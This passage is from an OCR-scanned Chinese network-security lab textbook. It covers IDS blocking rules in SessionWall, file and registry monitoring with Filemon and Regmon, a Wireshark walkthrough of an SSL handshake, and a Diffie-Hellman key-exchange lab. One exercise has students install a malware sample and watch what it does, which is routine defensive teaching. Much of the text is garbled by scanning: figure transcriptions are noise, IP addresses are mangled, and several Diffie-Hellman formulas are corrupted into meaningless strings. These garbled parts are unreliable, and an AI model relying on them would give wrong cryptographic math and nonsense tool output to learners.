送 给 特定 的 用 户 或 管理 员 等 。 选 项 非常 多 ， 由 此 可 以 进一步 体会 到 SessionWall IDS 系统 
的 强大 规则 定制 功能 。 

(20) 提示 合作 伙伴 试 着 执行 Telnet 命令 ,注意 此 时 已 经 无 法 连接 上 ， 因 为 在 有 关 
Telnet 连接 的 策略 中 使 用 了 Block It， 所 有 在 所 定义 的 地 址 范围 内 的 NetBus 的 连接 企图 
都 将 被 打 断 。 

(21) 最 大 化 SessionWall， 查 看 Alert Message 对 话 框 ， 双 击 有 关 信 息 ， 然 后 查看 第 
二 项 和 事件 描述 ， 这 时 将 看 到 有 关 Telnet 企图 连接 的 信息 。 

如 何 利用 网 络 工具 审计 当前 网 络 的 安全 特性 ， 怎 样 有 针对 性 地 审计 网 络 事件 等 都 需 
要 制定 详细 的 审计 规则 ， 本 实验 描述 的 有 关内 容 对 于 熟练 使 用 SessionWall 是 必 备 的 、 基 
础 的 ， 同 时 也 是 成 为 一 名 合格 的 网 络 安全 审计 人 员 所 必须 掌握 的 技能 。 


【实验 报告 】 
(1) 详细 叙述 实验 过 程 。 
(2) 利用 SessionWall 对 本 机 的 445 端口 进行 阻截 实验 。 


【思考 题 】 
网 络 监控 在 网 络 安全 中 可 以 发 挥 什么 作用 ? 


12.2.2 ”实时 主机 监视 


【实验 目的 】 
掌握 主机 活动 监测 的 方法 和 技术 。 


【原理 简介 】 

主机 监控 系统 就 是 在 被 检测 的 主机 上 运行 的 一 个 监控 程序 。 该 程序 扮演 着 检测 引擎 
的 角色 ， 它 根据 主机 行为 特征 库 对 受 检测 主机 上 的 可 疑 行为 进行 采集 、 分 析 和 判断 ， 并 
把 警报 信息 发 送 给 控制 端 程 序 ， 由 管理 员 集中 管理 。 此 外 ， 代 理 程 序 需 要 定期 给 控制 端 
发 出 信号 ， 以 使 管理 员 能 确信 代理 程序 工作 正常 。 

Regmon (Registry Monitor) 是 Sysinternals 公司 开发 的 一 个 出 色 的 注册 表 数 据 库 监 
视 软 件 ， 它 将 与 注册 表 数 据 库 相关 的 一 切 操作 〈 如 读 取 、 修 改 、 出 错 信息 等 ) 全 部 记录 
下 来 以 供用 户 参 考 ， 并 允许 用 户 对 记录 的 信息 进行 保存 、 过 滤 、 查 找 等 处 理 ， 这 就 为 用 
户 对 系统 的 维护 提供 了 极 大 的 便利 。Regmon 的 使 用 非常 简单 ， 只 需 运 行 该 程序 即 可 启 
动 它 的 系统 监视 功能 ， 自 动 将 系统 对 注册 表 数 据 库 的 读 取 、 修 改 等 操作 逐 笔记 录 下 来 ， 
此 后 就 可 以 凭借 它 所 做 的 记录 从 事 有 关系 统 维护 操作 了 。 

Filemon 是 Sysinternals 公司 开发 的 另 一 款 出 色 的 文件 系统 监视 软件 ， 它 可 以 监视 应 
用 程序 进行 的 文件 读 写 操作 。 它 将 所 有 与 文件 一 切 相关 操作 〈 如 读 取 、 修 改 、 出 错 信息 
等 ) 全 部 记录 下 来 以 供用 户 参 考 ， 并 允许 用 户 对 记录 的 信息 进行 保存 、 过 滤 、 查 找 等 处 
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H, 这 就 为 用 户 对 系统 的 维护 提供 了 极 大 的 便利 .这些 工具 可 以 从 http://www.sysinternals. 
com/index.html 网 站 下 载 。 


【实验 环境 】 
Windows 操作 系统 ，Regmon，Filemon，SessionWall。 


【实验 步骤 】 

1. 使 用 SessionWall 对 本 机 的 网 络 活动 进行 监控 

(1) 打开 SessionWall-3， 建 立 几 个 HTTP 和 FTP 连接 。 

(2) 在 SessionWall 中 观察 右 侧 窗 格 的 协议 带宽 占用 分 布 图 形 显 示 ， 图 12-24 只 是 一 
个 例子 ， 在 实际 中 ， 应 该 有 多 种 协议 组 成 带宽 占用 图 。 


gg Computer Associates SessionWall-3 loj xi 
Data Edit View Functions Settings Help 


ODHA DY 2a R eel ARO? 


Q Are you aware that you can view WWW sites on your browser? Define your 
browser as a helper application and click "Connect to Site" in the viewer 


gm g SMTP (Outgoing Email) - ses 


FTP 
HTTP (World Wide Web) 
E18) 192.168.0.92 


24,120,820 
22,657 
6,314 


Tracing active Z 


图 12-24 ”网络 流量 分 析 


(3) 开始 几 个 HTTP 和 FTP 会 话 ， 查 看 Session Wall 中 的 显示 结果 。 

(4) 查看 网 络 中 其 他 主机 的 当前 活动 ， 应 当 可 以 看 到 各 种 网 络 协议 的 通信 流量 和 具 
体 数 据 ， 甚 至 可 以 非常 清楚 地 看 出 主机 方正 在 查看 的 Web 页 面 ， 如 图 12-25 所 示 。 

(5) 提示 合作 伙伴 使 用 正 浏览 你 的 Web 站 点 ， 然 后 再 建立 一 个 FTP 会 话 ， 在 合作 
伙伴 完成 以 上 操作 后 ， 在 左边 的 窗 格 中 单 击 自己 的 系统 ， 展 开 它 们 观察 细节 描述 。 

在 建立 HTTP 连接 的 同时 ，SessionWall 捕捉 数据 包 并 加 以 重新 装配 ， 因 此 所 得 到 的 
监视 结果 就 是 实际 网 页 ， 对 网 络 系统 中 的 各 个 主机 活动 了 如 指 掌 ，SessionWall 的 这 一 功 
能 使 得 在 对 主机 级 安全 性 要 求 不 高 的 环境 下 完全 可 以 替代 ITA 等 主机 级 的 IDS。 

2. 使 用 Filemon 监控 主机 文件 操作 

(1) 打开 Filemon 程序 ， 如 图 12-26 所 示 。 
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Computer Associates SessionWall-3 loj xi 
Data Edt View Functions Settings Help 


ODHAD HA RG? 


Q Don't forget the right mouse button. Using it provides some real timesavers and 
uncovers more functions. 


IP - 192.168.0.92 
IP - 192.168.0.1 

physical address = 00:0D:60: 
physical address - 00:E0:4C: 
port - 1178 

port - 21 TCP 


Server -> Client 

220 haiang Microsoft FTP Service (Versic 
Client -> Server 

1 ..a&.] .EMZEh?? sHo  scMpUEP 
iri. . 6. 9. 8. 5. 0. D. 


DI. c. b. a. C1. DJ. 


30,687,496 
23,452 
6314 
[188 192.166.0.92 30,857,730 9,504 456 


| 2]\\ Cents A Severs > Users ) Recent activiy > Dthersevi |4| | 


图 12-25 ”网络 会 话 记录 


全 File Monitor - Sysinternals: www.sysinternals.com ini xi 
Ele Edi Options Volumes Help 


|e | IEE] 9F | AG) 


CAWINNT\System32\WBE 
CAProgram Files\Symante: 
! CAProgrem Files\Symanter 
21:45:47 CAWINNTDebugWtFrs, 0( 
21:45:47 C: 
21:45:47 T C. 
21:45:47 C:\Program Files\Microsoft 
21:45:47 CAProgram Files\Microsoft 
21:45:48 i CAProgram Files\Compute 
21:45:48 


图 12-26 Filemon 监测 窗口 


(2) 默认 的 Filemon 监控 所 有 进程 的 文件 操作 ， 会 生成 大 量 的 监控 记录 ， 为 了 便于 
观察 可 以 对 监控 记录 进行 过 滤 。 单 击 工具 栏 上 的 漏斗 形 图 标 ， 出 现 如 图 12-27 所 示 的 界 
面 ,可 以 进行 监控 过 滤 。 在 这 个 界面 中 用 户 可 以 在 mclude 域 中 填写 需要 监控 的 进程 名 称 ， 


* 表 示 所 有 进程 ; 
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可 以 在 Exclude 域 中 填写 不 需要 监控 的 进程 名 称 。 在 Highlight 域 中 填 


x 
Enter multiple fiter match strings separated by the ` character. ™ is 
Heus 


LogOpens [¥  LogReads IV ^ LogSuccesses IV 
Log Wits 万 LogErois: F Ete 


1227 Filemon 过 滤 条 件 设 置 
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写 高 亮 显示 的 进程 名 称 。 下 面 的 多 选项 表示 了 监控 的 动作 ， 可 以 监控 文件 的 读 、 写 、 打 
开 、 操 作成 功 和 失败 。 单 击 Apply 按钮 应 用 当前 规则 ， 单 击 OK 按钮 返回 到 主 程序 。 

G) 设置 好 过 滤 规 则 后 ， 对 监测 行为 再 进行 观测 。 

3. 使 用 Regmon 监控 注册 表 操 作 

(1) 打开 Regmon 程序 ， 如 图 12-28 所 示 。 

(2) 默认 的 Regmon 监控 所 有 进程 的 注册 表 操 作 ， 会 生成 大 量 的 监控 记录 ， 为 了 便 
于 观察 可 以 对 监控 记录 进行 过 滤 。 单 击 工具 栏 上 的 漏斗 形 图 标 ， 出 现 如 图 12-29 所 示 的 
界面 , 可 以 进行 监控 过 滤 。 在 这 个 界面 中 用 户 可 以 在 Include 域 中 填写 需要 监控 的 进程 名 
称 ，* 表 示 所 有 进程 ， 可 以 在 Exclude 域 中 填写 不 需要 监控 的 进程 名 称 。 在 Highlight bl 
中 填写 高 亮 显 示 的 进程 名 称 。 下 面 的 多 选项 表示 了 监控 的 动作 ， 可 以 监控 文件 的 读 、 写 、 
打开 、 操 作成 功 和 失败 。 单 击 Apply 按钮 应 用 当前 规则 ， 单 击 OK 按钮 返回 到 主 程序 ， 
如 图 12-29 所 示 。 


» Registry Monitor - Sysinternals: www.sysinternals.com. 1D) xi 
Bile Edt Options Help 
US ABT) 9 P| we) 


0.712536. CnxDsITb.exe:2... QueryVal.. HKLM\SOFTWARE\Cone 
0.712565. CnxDsITb.exe:2... QueryVal.. HKLM\SOFTWARE\Cone 
0.714187. CnxDsITb.exe:2... QueryVal.. HKLM\SOFTWARE\Cone 
0.714200.. P] LSASS.EXE:276 OpenKey HKLM\SYSTEM\CurrentC- 
0.714671... ©] LSASS EXE:276 QueryVal.. HKLM\SYSTEM\CurrentC 
0.714733.. P] LSASS EXE:276 CloseKey HKLM\SYSTEM\CurrentC 
0.714910.. ©] LSASS EXE:276 CloseKey HKLM\SECURITY(Policy 
0.715456.. @& Regmon.exe:21... OpenKey HKLM\System\CurrentCor 
0.715508... 4 Reamon.exe:21... OpenKev HI MiSvstam\CurrantCo z 


图 12-28 Regmon 窗口 


Enter multiple fiter match strings separated by the '' character. ™ is 
dm 
rss] 
Apply 
Defaults 


lx 


Include: E 

Exclude: 5 

Highlight: zi 

LogOpens: |V  LogRead [¥ Log Successes: 
LogWiles Log Enors: 


ad 


图 12-29 Regmon 过 滤 条 件 设置 


(3) 设置 好 过 滤 规 则 后 ， 对 监测 行为 再 进行 观测 。 

【实验 报告 】 

CD 详细 描述 实验 过 程 ， 分 析 SessionWall 能 够 获得 主机 网 络 操作 的 何 种 信息 。 

(2) 获取 一 个 恶意 软件 ， 对 恶意 软件 安装 操作 进行 文件 监控 和 注册 表 监 控 ， 观 察 恶 
意 软件 的 操作 行为 ， 并 根据 监控 结果 对 恶意 软件 进行 清除 。 

【思考 题 】 

当前 恶意 软件 层出不穷 ， 如 何 根据 监控 软件 判断 恶意 软件 ? 
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131 SSL 

【实验 目的 】 

掌握 SSL 协议 的 具体 流程 ， 分 析 协 议 握手 数据 包 。 
【原理 简介 】 


为 了 保证 网 络 通信 的 安全 性 和 数据 完整 性 ，Netscape 提出 了 SSL (Secure Sockets 
Layer， 安 全 套 接 层 ) 协议 。SSL 及 其 继任 者 TLS (Transport Layer Security， 传 输 层 安全 ) 
协议 在 传输 层 对 网 络 连接 进行 加 密 。 利 用 数据 加 密 技 术 和 消息 验证 码 技术 ， 可 确保 数据 
在 网 络 上 的 传输 过 程 中 不 会 被 非法 截获 与 算 改 。 

SSL 协议 所 提供 的 安全 功能 主要 有 : 客户 端 和 服务 器 的 双向 认证 、 加 密 网 络 数据 防 
止 非法 截获 、 为 网 络 数据 加 入 消息 验证 码 防 止 非法 算 改 。 

如 图 13-1 所 示 ，SSL 协议 位 于 TCP/IP 协议 与 各 种 应 用 层 协议 之 间 ， 为 数据 通信 提 
供 安 全 支持 。SSL 协议 可 分 为 以 下 两 层 : 

(1) SSL 记录 协议 〈SSL Record Protocol): 它 建立 在 可 靠 的 传输 协议 (如 TCP) 之 
上 ， 为 高 层 协 议 提供 数据 封装 、 压 缩 、 加 密 等 基本 功能 的 支持 。 

(2) SSL 握手 协议 (SSL Handshake Protocol): 它 建 立 在 SSL 记录 协议 之 上 ， 用 于 
在 实际 的 数据 传输 开始 前 ， 通 信 双 方 进行 身份 认证 、 协 商 加 密 算法 、 交 换 加 密 密 钥 等 。 


SSL 握 手 协议 
SSL 记 录 协 议 


SSL 协 议 层 


网 络 层 
图 13-1 SSL 协议 层 结构 示意 图 
SSL 握手 协议 工作 流程 如 图 13-2 所 示 。 
具体 交互 数据 包 内 部 结构 在 实验 过 程 中 详细 分 析 。 
目前 SSL 的 版 本 为 3.0。 它 已 被 广泛 地 用 于 网 络 购物 、 电 子 商 务 、 安 全 HTTP 等 对 
于 安全 性 要 求 较 高 的 应 用 。 在 实验 中 ， 将 具体 分 析 一 个 使 用 SSL 进行 网 络 购物 的 示例 。 
【实验 环境 】 
示例 流量 来 自 于 真实 的 互联 网 环境 ， 网 络 结构 如 图 13-3 所 示 。 
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服务 器 


1. 客 户 端 发 起 连接 请 求 ， 并 发 送 待 选 的 加 解密 算法 和 Hash 算 法 


3 
T 
at 


一 


2. 服 务 器 选择 安全 性 最 高 的 算法 ， 并 通知 客户 端 


3. 服 务 器 发 送 自己 的 证 书 ( 包 含 公 钥 ) 


一 


4. 客 户 端 验证 服务 器 的 证 书 ， 如 果 
用 服务 器 公 钥 加 密 


验证 成 功 ， 则 产生 一 个 随机 数 ， 
后 ， 发 往 服 务 器 


一 


5. 客 户 端 和 服务 器 根据 上 述 随机 数 ， 产 生 会 话 密 钥 ， 建 立 安全 连接 


一 一 


图 13-2 SSL 握手 协议 流程 示意 图 


客户 端 ” 一 一 一 互联 网 一 一 一 一 网 络 购物 服务 器 | 


128.238.38.162 216.75.194.220 
图 13-3 示例 流量 网 络 结构 


客户 端 卫 地 址 为 128.238.38.162， 网 络 购物 服务 器 的 IP 地 址 为 216.75.194.220。 实 验 
计算 机 使 用 Windows XP Professional 操作 系统 ， 安 装 有 Wireshark 1.2.2。 示 例 流 量 文件 为 
ssl-trace.pacp 。 需 要 注意 的 是 ， 一 个 卫 数据 包 内 有 可 能 封装 有 多 个 SSL Record 数据 包 。 


【实验 步骤 】 

(1) 单 击 Wireshark 图 标 ， 运 行 Wireshark 程序 。 

(2) 单 击 File， 选 择 Open 选项 ， 打 开 示 例 流量 文件 ssl-trace.pacp 。 

(3) 在 Wireshark 程序 的 过 滤器 中 ， 输 入 “ssl”， 只 显示 SSL 流量 ， 如 图 13-4 所 示 。 


T ssl-trace-2.pcap — Wireshark HetExpert utf8 Edition 


File Edit View Go Capture Analyze Statistics Telephony Tools Help 


Garaa SALTEA S aF BE Q.«eamB 


Filter: | ssl v Expression... Clear Apply 
No.. Time 
-305705 6 2 2 

108 21. 830201 . T5. 194. 220 128. 238. 38. 162 

111 21.853520 216. T5. 194. 220 128. 238. 38. 162 

112 21.876168 128. 238. 38. 162 216. 75. 194. 220 

113 21.945661 216. 15. 194. 220 128. 238. 38. 162 

114 21.954189 128. 238. 38. 162 216. T5. 194. 220 

122 23.480352 216. T5. 194. 220 128. 238. 38. 162 

123 23.481632 216. 15. 194. 220 128. 238. 38. 162 l 
ml 25 15204] N i 

129 23.482615 216. T5. 194. 220 128. 238. 38. 162 TCP U 
[et 320250536065 2162750194. 220 i 

134 23. 537016 216. 15. 194. 220 128. 238. 38. 162 SSLvà — C 

140 23. 537671 216. 15. 194. 220 128. 238. 38. 162 TCP [ 

149 23.559491 216. 15. 194. 220 128. 238. 38. 162 SSLv3 A 

150 23.560179 216. T5. 194. 220 128. 238. 38. 162 TCP r 

158 23. 560866 216. 75. 194. 220 128. 238. 38. 162 SSLv3 A 


图 13-4 过 滤 示例 流量 ， 仅 显示 SSL 流量 
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(4) 分 析 SSL 握手 协议 中 的 Client Hello 数据 包 ( 在 示例 流量 中 ， 编 号 为 106)， 单 
ij Secure Socket Layer 旁 的 加 号 图 标 ， 展 开 SSL 层 数据 结构 。Client Hello 数据 包 结 构 如 
图 13-5 所 示 。 


© Secure Socket Layer 
© SSLv2 Record Layer: Client Hello 

[Version: SSL 2.0 (0x0002)] 
Length: 76 
Handshake Message Type: Client Hello (1) 
Version: SSL 3.0 (0x0300) 
Cipher Spec Length: 51 
Session ID Length: 0 
Challenge Length: 16 

Cipher Specs (17 specs) 
Challenge 


图 13-5 Client Hello 数据 包 结 构 示 意图 


在 一 次 SSL 连接 中 ， 首 先 由 客户 端 发 送 Client Hello 数据 包 ， 发 起 连接 。 客 户 端的 
Client Hello 数据 包 采 用 SSL 2.0 版 本 ， 采 用 较 低 版 本 的 SSL， 是 防止 服务 器 无 法 识别 高 
版 本 SSL。 之 后 ， 客 户 端 与 服务 器 将 协商 并 使 用 双方 都 能 够 识别 的 最 高 版 本 SSL。 

Length 域 表 示 SSL 数据 包 的 长 度 。Handshake Message Type 域 表 示 数 据 包 的 类 型 ， 
在 本 例 中 为 Client Hello 类 型 .Version 域 表示 客户 端 所 支持 的 SSL 最 高 版 本 。 通 过 Version 
域 , 客户 端 向 服务 器 表明 自己 所 支持 的 SSL 最 高 版 本 为 3.0。 如 果 服 务 器 也 支持 3.0 版 本 
的 SSL， 则 接 下 来 双方 均 使 用 SSL 3.0 进行 通信 。Cipher Spec Length 域 表 示 客 户 端 所 支 
持 的 对 称 加 密 、 非 对 称 加 密 和 Hash 算 法 的 长 度 。Session ID Length 域 表示 所 支持 的 Session 
ID 的 长 度 。 如 果 客 户 端 需 要 恢复 一 个 以 前 的 SSL 连接 ， 则 会 在 数据 包 中 加 入 Session ID 
信息 。 在 本 例 中 ， 客 户 端 新 建 SSL 连接 ， 所 以 没有 Session ID 信息 ，Session ID Length 
域 为 0。Challenge Length 表示 客户 端 所 支持 的 挑战 随机 数 的 长 度 。Cipher Specs 域 表 示 
客户 端 所 支持 的 对 称 加 密 、 非 对 称 加 密 和 Hash 算法 的 组 合 。Challenge 域 是 客户 端 产生 
的 随机 数 。 

(5) 分 析 SSL 握手 协议 中 的 Server Hello 数据 包 〈 在 示例 流量 中 ， 编 号 为 108)， 单 
ili Secure Socket Layer 旁 的 加 号 图 标 ， 展 开 SSL 层 数据 结构 。Server Hello 数据 包 结 构 如 
图 13-6 所 示 。 


Hj Transmission Control Protocol, Src Port: https (443), Dst Port: mmcals (' 
© Secure Socket Layer 
5 SSLv3 Record Layer: Handshake Protocol: Server Hello 

Content Type: Handshake (22) 

Version: SSL 3.0 (0x0300) 

Length: 74 

© Handshake Protocol: Server Hello 
Handshake Type: Server Hello (2) 


Length: 70 
Version: SSL 3.0 (0x0300) 
由 Random 


Session ID Length: 32 

Session ID: 1BADOSFABAO2EA92C64C54BE454 1C32F3E3CA63D3A0C86DD. . . 
Cipher Suite: TLS RSÀ WITH RC4 128 MD5 (0x0004) 

Compression Method: null (0) 


图 13-6 Server Hello 数据 包 结构 示意 图 
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在 收 到 客户 端的 Client Hello 数据 包 之 后 , 服务 器 通过 Server Hello 数据 包 进行 回答 。 
服务 器 的 返回 信息 使 用 的 是 SSL 3.0， 这 是 由 于 在 Client Hello 信息 中 ， 客 户 端 已 经 表明 
自己 所 支持 的 最 高 版 本 的 SSL 为 3.0 版 本 。 

SSLv3 Record Layer 是 SSL 记录 协议 层 信息 。Content Type 域 表 明 数 据 包 类 型 , 在 本 
例 中 为 Handshake 类 型 。Version 域 表 示 所 使 用 的 SSL 版 本 信息 。Length 表示 SSL 数据 
包 长 度 信息 。 

Handshake Protocol 是 SSL 握手 协议 层 信息 。Handshake Type 域 表 示 SSL 握手 协议 
数据 包 类 型 , 在 本 例 中 , 为 Server Hello 类 型 。Length 域 表 示 SSL 握手 协议 数据 包 长 度 。 
Version 域 表 示 SSL 版 本 信息 。Random 是 服务 器 产生 的 随机 数 。Session ID Length 域 表 
示 Session ID 长 度 信息 。Session ID 域 是 服务 器 产生 的 Session ID 信息 。Session ID 为 服 
务 器 产生 的 Session ID 号 。Cipher Suite 域 表 示 服 务 器 所 选择 的 非 对 称 加 密 、 对 称 加 密 和 
Hash 算法 组 合 ， 在 本 例 中 为 RSA、RC4 和 MDS. Compression Method 域 表 示 服 务 器 选 
择 的 数据 压缩 算法 ， 在 本 例 中 为 null， 表 示 不 对 传输 数据 进行 压缩 。 

(6) 分 析 SSL 握手 协议 中 的 Certificate, Server Hello Done 数据 包 〈 在 示例 流量 中 ， 
编号 为 111)。 数 据 包 结构 如 图 13-7 所 示 。 


© Secure Socket Layer 
S SSLv3 Record Layer: Handshake Protocol: Certificate 
Content Type: Handshake (22) 
Version: SSL 3.0 (0x0300) 
Length: 2691 
E Handshake Protocol: Certificate 
Handshake Type: Certificate (11) 
Length: 2687 
Certificates Length: 2684 
Certificates (2684 bytes) 
© SSLv3 Record Layer: Handshake Protocol: Server Hello Done 
Content Type: Handshake (22) 
Version: SSL 3.0 (0x0300) 
Length: 4 
E Handshake Protocol: Server Hello Done 
Handshake Type: Server Hello Done (14) 
Length: 0 


图 13-7 Certificate, Server Hello Done 数据 包 结 构 示 意图 


在 用 Server Hello 回应 客户 端 之 后 , 服务 器 继续 通过 Certificate 数据 包 向 客户 端 发 送 
自己 的 证 书 。 其 中 ，Certificates Length 域 表 示 证 书 的 长 度 。Certificates 域 是 证 书信 息 。 
证 书 的 具体 格式 与 所 选择 的 非 对 称 加 密 算 法 有 关 。 接 着 ， 服 务 器 向 客户 端 发 送 Server 
Hello Done 数据 包 ， 表 示 握 手 协商 阶段 完成 。 

(7) 分 析 SSL 握手 协议 中 的 Client Key Exchange、Change Cipher Spec、Encrypted 
Handshake Message 数据 包 在 示例 流量 中 ， 编 号 为 112)。 数 据 包 结构 如 图 13-8 所 示 。 

这 三 个 数据 包 被 封装 在 一 个 IP 数据 包 之 内 。 在 收 到 服务 器 的 Server Hello Done 数据 
包 之 后 ， 客 户 端 发 送 这 三 个 数据 包 作为 回应 。 

根据 所 选择 的 密码 算法 ，Client Key Exchange 数据 包 可 以 有 选择 地 包含 客户 端 产生 
的 随机 数 和 客户 端的 公 钥 信息 ， 这 些 信息 均 使 用 服务 器 的 公 钥 进行 加 密 ， 保 证 通信 的 私 
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= Transmission Control Protocol, Src Port: mmcals (2271), Dst Port: https 
© Secure Socket Layer 
Ej SSLv3 Record Layer: Handshake Protocol: Client Key Exchange 
Content Type: Handshake (22) 
Version: SSL 3.0 (0x0300) 
Length: 132 
Handshake Protocol: Client Key Exchange 
& SSLv3 Record Layer: Change Cipher Spec Protocol: Change Cipher Spec 
Content Type: Change Cipher Spec (20) 
Version: SSL 3.0 (0x0300) 
Length: 1 
Change Cipher Spec Message 
i SSLv3 Record Layer: Handshake Protocol: Encrypted Handshake Message 
Content Type: Handshake (22) 
Version: SSL 3.0 (0x0300) 
Length: 56 
Handshake Protocol: Encrypted Handshake Message 


图 13-8 Client Key Exchange. Change Cipher Spec, Encrypted Handshake Message 数据 包 


密 性 。 服 务 器 在 接 到 此 数据 包 之 后 ， 使 用 自己 的 私 钥 进行 解密 ， 取 出 客户 端的 随机 数 和 
公 钼 信息 。 之 后 ， 客 户 端 和 服务 器 使 用 此 随机 数 和 之 前 交互 过 程 中 的 随机 数 产生 会 话 

Change Cipher Spec 数据 包 表 示 从 此 时 开始 ， 到 这 个 SSL 连接 结束 ， 客 户 端 所 发 送 
的 数据 包 均 使 用 会 话 密 钥 进行 加 密 ， 并 加 入 消息 验证 码 ， 保 护 数 据 的 私密 性 和 完整 性 。 

Encrypted Handshake Message 数据 包 包含 之 前 所 有 握手 数据 包 的 消息 验证 码 ， 并 使 
用 会 话 密 钥 加 密 。 服 务 器 使 用 会 话 密 钥 解密 之 后 ， 验 证 消息 验证 码 ， 如 果 验 证 失败 ， 则 
认为 握手 过 程 失 败 ， 切 断 连接 。 如 果 验 证 成 功 ， 则 发 送 以 下 回应 数据 包 。 

(8) 分 析 SSL 握手 协议 中 的 服务 器 侧 Change Cipher Spec. Encrypted Handshake 
Message 数据 包 〈 在 示例 流量 中 ， 编 号 为 113)。 数 据 包 结 构 如 图 13-9 所 示 。 


E Secure Socket Layer 

© SSLv3 Record Layer: Change Cipher Spec Protocol: Change Cipher Spec 
Content Type: Change Cipher Spec (20) 
Version: SSL 3.0 (0x0300) 
Length: 1 
Change Cipher Spec Message 

© SSLv3 Record Layer: Handshake Protocol: Encrypted Handshake Message 
Content Type: Handshake (22) 
Version: SSL 3.0 (0x0300) 
Length: 56 
Handshake Protocol: Encrypted Handshake Message 


图 13-9 Change Cipher Spec. Encrypted Handshake Message 数据 包 


Change Cipher Spec 数据 包 表 示 从 此 时 开始 ， 到 这 个 SSL 连接 结束 ， 服 务 器 所 发 送 
的 数据 包 均 使 用 会 话 密 钥 进行 加 密 。 

Encrypted Handshake Message 数据 包 包含 之 前 所 有 握手 数据 包 的 消息 验证 码 ， 并 使 
用 会 话 密 钥 加 密 。 客 户 端 使 用 会 话 密 钥 解 密 之 后 ， 验 证 消息 验证 码 ， 如 果 验 证 失败 ， 则 
认为 握手 过 程 失 败 ， 切 断 连 接 。 如 果 验 证 成 功 ， 则 SSL 握手 过 程 成 功 。 

至 此 SSL 连接 正式 建立 ， 可 以 进行 数据 传输 。 所 传输 的 数据 均 由 会 话 密 钥 加 密 ， 并 
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加 入 消息 验证 码 ， 保 证 通信 的 保密 性 和 完整 性 。 


【实验 报告 】 

(1) 详细 描述 实验 过 程 。 

(2) 选择 示例 流量 中 另 一 SSL 连接 (或 从 互联 网 捕获 新 SSL 连接 )， 分 析 SSL 握手 
协议 数据 包 。 


【思考 题 】 
(1) 根据 SSL 握手 协议 过 程 ， 分 析 SSL 可 抵御 的 网 络 攻击 。 
(2) 查阅 相关 资料 ， 指 出 SSL 的 安全 缺陷 和 改进 方法 。 


132 Diffie-Hellman 


【实验 目的 】 
掌握 Diffie-Hellman 密 钥 交换 协议 交互 过 程 及 其 数学 原理 。 
【原理 简介 】 


通过 Diffie-Hellman 密 钥 交换 协议 可 以 在 没有 任何 共享 秘密 信息 的 情况 下 ， 通 过 不 
安全 的 网 络 协商 出 会 话 密 钥 。 此 会 话 密 钥 可 以 用 在 接 下 来 的 对 称 加 密 过 程 中 ， 保 护 数据 
的 机 密 性 。Diffie-Hellman 密 钥 交换 协议 本 身 并 不 提供 认证 功能 ， 但 却 是 许多 认证 协议 的 
基础 。 在 TLS 协议 的 快速 模式 中 也 应 用 了 Diffie-Hellman 密 钥 交换 协议 。 

Diffie-Hellman 密 钥 交换 协议 的 交互 过 程 如 图 13-10 所 示 。 


Alice Bob ] 


1.Alice 选 择 素数 和 以 为 阶 的 群 的 生成 元 sg， 并 发 送 给 Bob 


- 


2.Alice 产 生 随机 数 a， 计 算 4=gr mod p， 将 4 发 送 给 Bob 


3.Bob 产 生 随 机 数 ，， 计 算 B=gt mod p， 将 8 发 送 给 Alice 


一 


4. Alici HE SiG EHB mod p，Bob 计 算 会 话 密 钥 s=4* mod p 


图 13-10 Diffie-Hellman 密 钥 交换 协议 示意 图 


下 面 给 出 一 个 Diffie-Hellman 密 钥 交换 协议 的 示例 。 
(1) Alice 选择 p=23，g=5， 并 发 送 给 Bob. 
(2) Alice 选择 a=6， 计算 A=g* mod p， 并 发 送 给 Bob. 
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e 4=5° mod 23 

e A=15 625 mod 23 

e A=8 

(3) Bob 选择 b=15, ilft B— g^ mod p. Jf RIE Alice. 


B= 555 mod 23 
B= 30 517 578 125 mod 23 
B-19 


(4) Alice 计算 s= B" mod p. 


s= 195 mod 23 
s = 47 045 881 mod 23 
s=2 


(5) Bob 计算 s= 4’ mod p. 


s=8' mod 23 
s = 35 184 372 088 832 mod 23 
s=2 


(6) 现在 Alice 和 Bob 共享 会 话 密 钥 s = 2. WERFT AAI BIA, WEA 
通过 以 下 运算 ， 计 算出 会 话 密 钥 : 


s = 56%!5 mod 23 

$7 5596 mod 23 

$7 5? mod 23 

s — 807 793 566 946 316 088 741 610 050 849 573 099 185 363 389 551 639 556 884 
765 625 mod 23 

s-2 


可 以 看 出 ， 从 4 和 B 信 息 计算 会 话 密 钥 s 的 运算 量 较 大 。 如 果 所 选择 的 各 个 整数 足 
够 大 ， 则 可 以 保证 己 知 4 和 B 计 算 s 的 运算 足够 复杂 。 

会 话 密 钥 s 可 以 用 于 对 称 加 密 算法 ， 但 对 于 具体 算法 并 没有 要 求 。Diffie-Hellman 也 
提供 了 一 种 对 称 加 解密 方法 。 

A) Alice 待 发 送 明文 m， 计 算 M= ms mod p， 并 发 送 给 Bob. 

(2) Bob 恢复 明文 ， 计 算 m=mss! mod p. 

其 中 s 为 s 的 道 ， 可 以 按照 如 下 方法 计算 : 


(EP = g0 = gp — gi grab = ( gpytgrab_yag-ab_g-ab_ gabe! mod p 


【实验 环境 】 
本 实验 环境 如 图 13-11 所 示 。 
客户 端 交换 机 服务 器 | 
192.168.1.100 192.168.1.101 


图 13-11 Differ-Hellman 实验 环境 
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C-S 模式 局 域 网 环境 ，Windows XP Professional 操作 系统 ，Microsoft Visual C++ 6.0 
开发 环境 。 
【实验 步骤 】 
(1) 单 击 Microsoft Visual C++ 6.0 图 标 ， 打 开 Microsoft Visual C++ 6.0 应 用 程序 。 
(2) 选择 【文件 】|【 打 开工 作 空间 】)， 打 开 DH student 工程 。 


(3) 完成 DH_fun.cpp 中 各 个 函数 的 具体 实现 ， 如 图 13-12 所 示 。 
mmm ft Visual C — [DH fun.cpp] 
DXO KO BEY HAD IB Sg IAV ED Hho 
ced Be ----mme Alo dae Pe sae oi 
(Globals) 了 jj Al global member: jj @Calcu_S_Ops Rr CBX INS 
ap [6 caeso» ][ int Cacus ops Gnt s, int p) 


Tg LEE 'DH student: 1 工程 
= BIDH student files 
= C3 Source Files 
E DH. fun.cpp 
= C3 Header Files 
© DH. fun.h 
Cj Resource Files 
* Cj External Dependencies 


Winclude "StdRFx.h" 
include "DH Fun.h" 


int Calcu Exp(int a, 
return 0; 

> 

int Calcu Pub(int g, 


return 0; 


int Calcu S(int rec, 


int exp, int p) 


int p,int pri) 


int pri, int p) 


return 0; 


int Calcu S Ops(int s, int p) 


return 0] 


int Encrypt_nsg(int m, int s, int p) 


return 0; 


int Decrypt msg(int rec, int s ops, int p) 


list i 


*$ClassView | 8] FileView 


到 
A 


[T1 état OO) ETP J ERE) FEM) SAL Debating 7 Tet 


Ready 
图 13-12 


